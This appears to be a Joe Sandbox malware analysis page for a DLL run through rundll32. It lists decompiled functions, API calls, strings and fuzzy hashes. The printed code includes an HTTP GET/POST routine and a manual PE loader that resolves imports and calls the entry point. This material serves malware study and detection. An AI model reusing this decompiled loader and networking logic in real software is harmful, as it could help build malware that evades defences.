Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: ea4d4a06ababf097d1f427d636e20c623771a99ae6d7e2ce5fcd8467c9237de7
Instruction ID: bcf02c9419d9941f1c28ba2f8d3f55f4af3997818ec7d333a51f7a575932be52
Opcode Fuzzy Hash: ea4d4a06ababf097d1f427d636e20c623771a99ae6d7e2ce5fcd8467c9237de7
Instruction Fuzzy Hash: 6711A53A90562AB7DB11DBA88C81F9EB7ECDF45750F118061FB00EF140EB70DE8546A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000F919 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000F919(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				int _v72;
				void* _v76;
				intOrPtr _v96;
				int _v100;
				void* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char* _v116;
				char _v120;
				char _v136;
				void _v396;
				void _v652;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr _t107;
				signed int _t108;
				void* _t109;
				intOrPtr _t110;
				signed int _t111;
				intOrPtr _t113;
				char _t115;
				intOrPtr _t120;
				signed int _t122;
				intOrPtr _t128;
				intOrPtr _t132;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t140;
				char _t144;
				intOrPtr _t146;
				void* _t155;
				signed int _t157;
				void* _t161;
				intOrPtr _t167;
				intOrPtr _t172;
				signed int _t173;
				signed int _t182;
				char _t186;
				signed int _t187;
				void* _t188;
				signed int _t190;
				signed int _t191;
				char _t192;
				void* _t193;

				_v24 = __ecx;
				_v36 = 0;
				_v28 = 4;
				_v32 = 1;
				_t188 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v60 = E10009473(0x1232);
				_t89 = E10009473(0xd24);
				_t161 = 0x7d;
				_v56 = _t89;
				_v52 = E10009473(_t161);
				_v48 = E10009473(0x14e);
				_t92 = E10009473(0x580);
				_v40 = _v40 & 0;
				_t186 = 0x3c;
				_v44 = _t92;
				E100096BF( &_v120, 0, 0x100);
				_v112 = 0x10;
				_v116 =  &_v136;
				_v120 = _t186;
				_v104 =  &_v396;
				_v100 = 0x100;
				_v76 =  &_v652;
				_push( &_v120);
				_push(0);
				_v72 = 0x100;
				_push(E1000D389(_t188));
				_t100 =  *0x10020d70; // 0x0
				_push(_t188);
				if( *((intOrPtr*)(_t100 + 0x28))() != 0) {
					_t182 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t102 =  *0x10020d70; // 0x0
						_v8 = 0x8404f700;
						_t187 =  *_t102( *0x10020e88,  *((intOrPtr*)(_t193 + _t182 * 4 - 0x20)), 0, 0, 0);
						__eflags = _t187;
						if(_t187 != 0) {
							E1000F8B1(_t187);
							_t107 =  *0x10020d70; // 0x0
							_t108 =  *((intOrPtr*)(_t107 + 0x1c))(_t187,  &_v396, _v96, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t157 = _t108;
							if(_a24 != 0) {
								E1000B983(_a24);
							}
							__eflags = _t157;
							if(_t157 != 0) {
								__eflags = _v108 - 4;
								_t167 = 0x8484f700;
								if(_v108 != 4) {
									_t167 = _v8;
								}
								__eflags = _v24 - 2;
								_t109 = 0x1001e01c;
								if(_v24 != 2) {
									_t109 = 0x1001e024;
								}
								_t110 =  *0x10020d70; // 0x0
								_t111 =  *((intOrPtr*)(_t110 + 0x20))(_t157, _t109,  &_v652, 0, 0,  &_v60, _t167, 0);
								__eflags = _a24;
								_t190 = _t111;
								_v8 = _t190;
								if(_a24 != 0) {
									E1000B983(_a24);
								}
								__eflags = _t190;
								if(_t190 != 0) {
									__eflags = _v108 - 4;
									if(_v108 == 4) {
										E1000F85F(_t190);
									}
									__eflags = _v24 - 2;
									if(_v24 != 2) {
										__eflags = 0;
										_t113 =  *0x10020d70; // 0x0
										_v8 =  *((intOrPtr*)(_t113 + 0x24))(_t190, 0, 0, 0, 0);
									} else {
										_t144 = E10009473(0xfe2);
										_t192 = _t144;
										_v16 = _t192;
										_t146 =  *0x10020d70; // 0x0
										_t190 = _v8;
										_v8 =  *((intOrPtr*)(_t146 + 0x24))(_t190, _t192, E1000D389(_t192), _a4, _a8);
										E1000A27E( &_v16);
									}
									__eflags = _a24;
									if(_a24 != 0) {
										E1000B983(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L31:
										_t115 = 8;
										_v28 = _t115;
										_v20 = 0;
										_v16 = 0;
										E100096BF( &_v20, 0, _t115);
										_t120 =  *0x10020d70; // 0x0
										__eflags =  *((intOrPtr*)(_t120 + 0xc))(_t190, 0x13,  &_v20,  &_v28, 0);
										if(__eflags != 0) {
											_t122 = E1000B88D( &_v20, __eflags);
											__eflags = _t122 - 0xc8;
											if(_t122 == 0xc8) {
												 *_a20 = _t190;
												 *_a12 = _t187;
												 *_a16 = _t157;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t122;
											L35:
											_t128 =  *0x10020d70; // 0x0
											 *((intOrPtr*)(_t128 + 8))(_t190);
											_t191 = _v12;
											L36:
											__eflags = _t157;
											if(_t157 != 0) {
												_t132 =  *0x10020d70; // 0x0
												 *((intOrPtr*)(_t132 + 8))(_t157);
											}
											__eflags = _t187;
											if(_t187 != 0) {
												_t172 =  *0x10020d70; // 0x0
												 *((intOrPtr*)(_t172 + 8))(_t187);
											}
											return _t191;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L35;
									} else {
										GetLastError();
										_t136 =  *0x10020d70; // 0x0
										 *((intOrPtr*)(_t136 + 8))(_t190);
										_t190 = 0;
										__eflags = 0;
										goto L26;
									}
								} else {
									GetLastError();
									L26:
									_t138 =  *0x10020d70; // 0x0
									 *((intOrPtr*)(_t138 + 8))(_t157);
									_t157 = 0;
									__eflags = 0;
									goto L27;
								}
							} else {
								GetLastError();
								L27:
								_t140 =  *0x10020d70; // 0x0
								 *((intOrPtr*)(_t140 + 8))(_t187);
								_t187 = 0;
								__eflags = 0;
								goto L28;
							}
						}
						GetLastError();
						L28:
						_t173 = _t190;
						_t182 = _v12 + 1;
						_v12 = _t182;
						__eflags = _t182 - 2;
					} while (_t182 < 2);
					__eflags = _t173;
					if(_t173 != 0) {
						goto L31;
					}
					_t191 = 0xfffffffe;
					goto L36;
				}
				_t155 = 0xfffffffc;
				return _t155;
			}

0x1000f927
0x1000f92f
0x1000f936
0x1000f943
0x1000f94b
0x1000f94d
0x1000f95e
0x1000f975
0x1000f978
0x1000f97f
0x1000f980
0x1000f98b
0x1000f998
0x1000f99b
0x1000f9a0
0x1000f9a5
0x1000f9a7
0x1000f9af
0x1000f9ba
0x1000f9c1
0x1000f9cd
0x1000f9d0
0x1000f9de
0x1000f9e1
0x1000f9e7
0x1000f9e8
0x1000f9ea
0x1000f9f3
0x1000f9f4
0x1000f9f9
0x1000f9ff
0x1000fa09
0x1000fa09
0x1000fa0b
0x1000fa10
0x1000fa10
0x1000fa1f
0x1000fa2e
0x1000fa30
0x1000fa32
0x1000fa41
0x1000fa58
0x1000fa5e
0x1000fa61
0x1000fa65
0x1000fa67
0x1000fa6c
0x1000fa6c
0x1000fa71
0x1000fa73
0x1000fa80
0x1000fa84
0x1000fa89
0x1000fa8b
0x1000fa8b
0x1000fa8e
0x1000fa92
0x1000fa97
0x1000fa99
0x1000fa99
0x1000fab0
0x1000fab6
0x1000fab9
0x1000fabd
0x1000fabf
0x1000fac2
0x1000fac7
0x1000fac7
0x1000facc
0x1000face
0x1000fadb
0x1000fadf
0x1000fae3
0x1000fae3
0x1000fae8
0x1000faec
0x1000fb25
0x1000fb2b
0x1000fb34
0x1000faee
0x1000faf3
0x1000fafb
0x1000fb00
0x1000fb0b
0x1000fb11
0x1000fb1b
0x1000fb1e
0x1000fb1e
0x1000fb37
0x1000fb3b
0x1000fb40
0x1000fb40
0x1000fb45
0x1000fb49
0x1000fb8f
0x1000fb91
0x1000fb94
0x1000fb9c
0x1000fba0
0x1000fba3
0x1000fbb5
0x1000fbc0
0x1000fbc2
0x1000fbd6
0x1000fbdb
0x1000fbe0
0x1000fc15
0x1000fc1a
0x1000fc1f
0x1000fc21
0x00000000
0x1000fc21
0x1000fbe4
0x1000fbe7
0x1000fbe7
0x1000fbed
0x1000fbf0
0x1000fbf3
0x1000fbf3
0x1000fbf5
0x1000fbf7
0x1000fbfd
0x1000fbfd
0x1000fc00
0x1000fc02
0x1000fc04
0x1000fc0b
0x1000fc0b
0x00000000
0x1000fc0e
0x1000fbc4
0x1000fbca
0x00000000
0x1000fb4b
0x1000fb4b
0x1000fb51
0x1000fb57
0x1000fb5a
0x1000fb5a
0x00000000
0x1000fb5a
0x1000fad0
0x1000fad0
0x1000fb5c
0x1000fb5c
0x1000fb62
0x1000fb65
0x1000fb65
0x00000000
0x1000fb65
0x1000fa75
0x1000fa75
0x1000fb67
0x1000fb67
0x1000fb6d
0x1000fb70
0x1000fb70
0x00000000
0x1000fb70
0x1000fa73
0x1000fa34
0x1000fb72
0x1000fb75
0x1000fb77
0x1000fb7a
0x1000fb7d
0x1000fb7d
0x1000fb86
0x1000fb88
0x00000000
0x00000000
0x1000fb8c
0x00000000
0x1000fb8c
0x1000fa03
0x00000000

APIs

memset.MSVCRT ref: 1000F94D
memset.MSVCRT ref: 1000F95E

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000FA34

Strings

POST, xrefs: 1000FA92
GET, xrefs: 1000FA99, 1000FAAF

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: memset$ErrorLast
String ID: GET$POST
API String ID: 2570506013-3192705859
Opcode ID: 5137b3a0b5685b47c74c298811dfd1042f56357df4ff912952738d4948db115f
Instruction ID: 60176bb3b918099171355f2e0455e639eaf927cb7297a2eeaffab32ddf1112b2
Opcode Fuzzy Hash: 5137b3a0b5685b47c74c298811dfd1042f56357df4ff912952738d4948db115f
Instruction Fuzzy Hash: 55A14DB1900618AFEB10DFA4CC84ABEBBF9FF49350F104069F905E72A1DB34AA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100126D6 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10012756
qsort.MSVCRT ref: 100129D4

Strings

true, xrefs: 1001272D
false, xrefs: 10012739
null, xrefs: 1001271B
%I64d, xrefs: 10012748

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 58f23407bd26eee7a2894696c6464957577155679522b91e5bdae1fe44fed9b8
Instruction ID: 6ab0388892a03626c6ba9818edcedb4f868e89afd272a7049aaf2efd7bcae5db
Opcode Fuzzy Hash: 58f23407bd26eee7a2894696c6464957577155679522b91e5bdae1fe44fed9b8
Instruction Fuzzy Hash: 53E149B550420ABFEF11DE64CC82EAF3BA9EF45394F108419FE149E181E631D9F19BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6936E072 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Scre_fullinfo.PUTTY ref: 6936E095

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Scre_fullinfo
String ID:
API String ID: 3112101106-0
Opcode ID: 6dcebc9b637d95a7c3c00b674dbc11df12d7e4a94ef838fc4549ba4ba70972a7
Instruction ID: d01181398fbdb300edae4c99a541ba18f80170732bc52e9bc19656bce0c56a82
Opcode Fuzzy Hash: 6dcebc9b637d95a7c3c00b674dbc11df12d7e4a94ef838fc4549ba4ba70972a7
Instruction Fuzzy Hash: C6519F74A04209DFCB10DFA8C985AAEBBF1BF48344F108529E854EB354E335A955CF91

Uniqueness

Uniqueness Score: -1.00%

Function 69341020 Relevance: 9.1, APIs: 6, Instructions: 112sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,693412E0,?,?,?,?,?,?,693413A3), ref: 69341057
_amsg_exit.MSVCRT ref: 69341085

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: f9b4f6d0b30007e82f9b2dcb04df29e04556d41dbf668b3bd9aab9173f648a1d
Instruction ID: fe10e7d6ec79cb2727974a487930bd28d32519eb45b7cfcc6c01c376984925dc
Opcode Fuzzy Hash: f9b4f6d0b30007e82f9b2dcb04df29e04556d41dbf668b3bd9aab9173f648a1d
Instruction Fuzzy Hash: 3141A7B16187408FEB00EF9DD68171B77E8FBA2B44F52462DD4648B244D77AC4A1CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1000B07D Relevance: 9.1, APIs: 6, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000B07D(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push("\\");
						_t36 = E10009DC8( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E1000953B( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}

0x1000b086
0x1000b08d
0x1000b090
0x1000b09d
0x1000b0a3
0x1000b0a6
0x1000b0a8
0x1000b0ad
0x1000b185
0x1000b185
0x1000b185
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b0b3
0x1000b0b3
0x1000b0b3
0x1000b0b6
0x1000b0bc
0x1000b0d8
0x1000b0df
0x1000b0e5
0x1000b0e9
0x1000b0fd
0x1000b0fd
0x1000b100
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b0eb
0x1000b0eb
0x1000b0f0
0x1000b0f4
0x1000b0f4
0x1000b0f8
0x1000b0f9
0x00000000
0x1000b0eb
0x1000b101
0x1000b101
0x1000b104
0x1000b105
0x1000b10c
0x1000b116
0x00000000
0x00000000
0x1000b118
0x1000b11e
0x1000b122
0x1000b17b
0x1000b12b
0x1000b138
0x1000b13e
0x1000b140
0x1000b147
0x1000b14d
0x1000b155
0x1000b15d
0x1000b169
0x1000b16f
0x00000000
0x1000b181
0x1000b10e
0x00000000

APIs

GetCommandLineW.KERNEL32 ref: 1000B092
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000B09D
lstrlenW.KERNEL32 ref: 1000B0DF
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000B138
lstrcpynW.KERNEL32(?,00000000,00000104), ref: 1000B15D
lstrcpynW.KERNEL32(?,?,00000104), ref: 1000B17B

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
String ID:
API String ID: 1259063344-0
Opcode ID: 674de03f7284a0a6e09ea563e48131a4c2cb913a3190575a73f7948faaa34436
Instruction ID: 6040b5f80791b44e58dcf4f25a74dd89cab7fcefb426b9fe502b13d349ab77a1
Opcode Fuzzy Hash: 674de03f7284a0a6e09ea563e48131a4c2cb913a3190575a73f7948faaa34436
Instruction Fuzzy Hash: 4D31E171D00516BBFB20EF94CC94AEEB7F8EF05390F518559E412E3054EB709AC18B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000DBC8 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000DBDC
SysAllocString.OLEAUT32(?), ref: 1000DBE4
SysAllocString.OLEAUT32(00000000), ref: 1000DBF8
SysFreeString.OLEAUT32(?), ref: 1000DC73
SysFreeString.OLEAUT32(?), ref: 1000DC76
SysFreeString.OLEAUT32(?), ref: 1000DC7B

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 9e9d9e0d3d7b8979127c60d1f401c69ad389860a69b845eb569b7036a2d8c55e
Instruction ID: 5154142f606cb33e32ed2096994121df708758d659f1894e466c11fc5810634a
Opcode Fuzzy Hash: 9e9d9e0d3d7b8979127c60d1f401c69ad389860a69b845eb569b7036a2d8c55e
Instruction Fuzzy Hash: 8A211D75E00219BFEB00DFA5CC88D9FBBBCEF49694B10449AF505E7250DA71AE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 69370BD8 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

Scre_fullinfo.PUTTY ref: 69370CE3
memset.MSVCRT ref: 69370D31

Strings

ERCP, xrefs: 69370C10
, xrefs: 69370EC1

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Scre_fullinfomemset
String ID: $ERCP
API String ID: 1073896759-4058133170
Opcode ID: b582e281489c2d5cf5d12ce119fd34363468adf4fafc54460c0903d6a961ab46
Instruction ID: 460c783e213dd51e12951c5fd4a79c46cdab34686178c6fd61c75c312007e044
Opcode Fuzzy Hash: b582e281489c2d5cf5d12ce119fd34363468adf4fafc54460c0903d6a961ab46
Instruction Fuzzy Hash: 0EB16BB4A043098FDB50CF99C685B9EBBF0FB48314F118559E858AB351D339E941CF65

Uniqueness

Uniqueness Score: -1.00%

Function 10014DFC Relevance: 7.8, APIs: 5, Instructions: 322
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10014DFC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
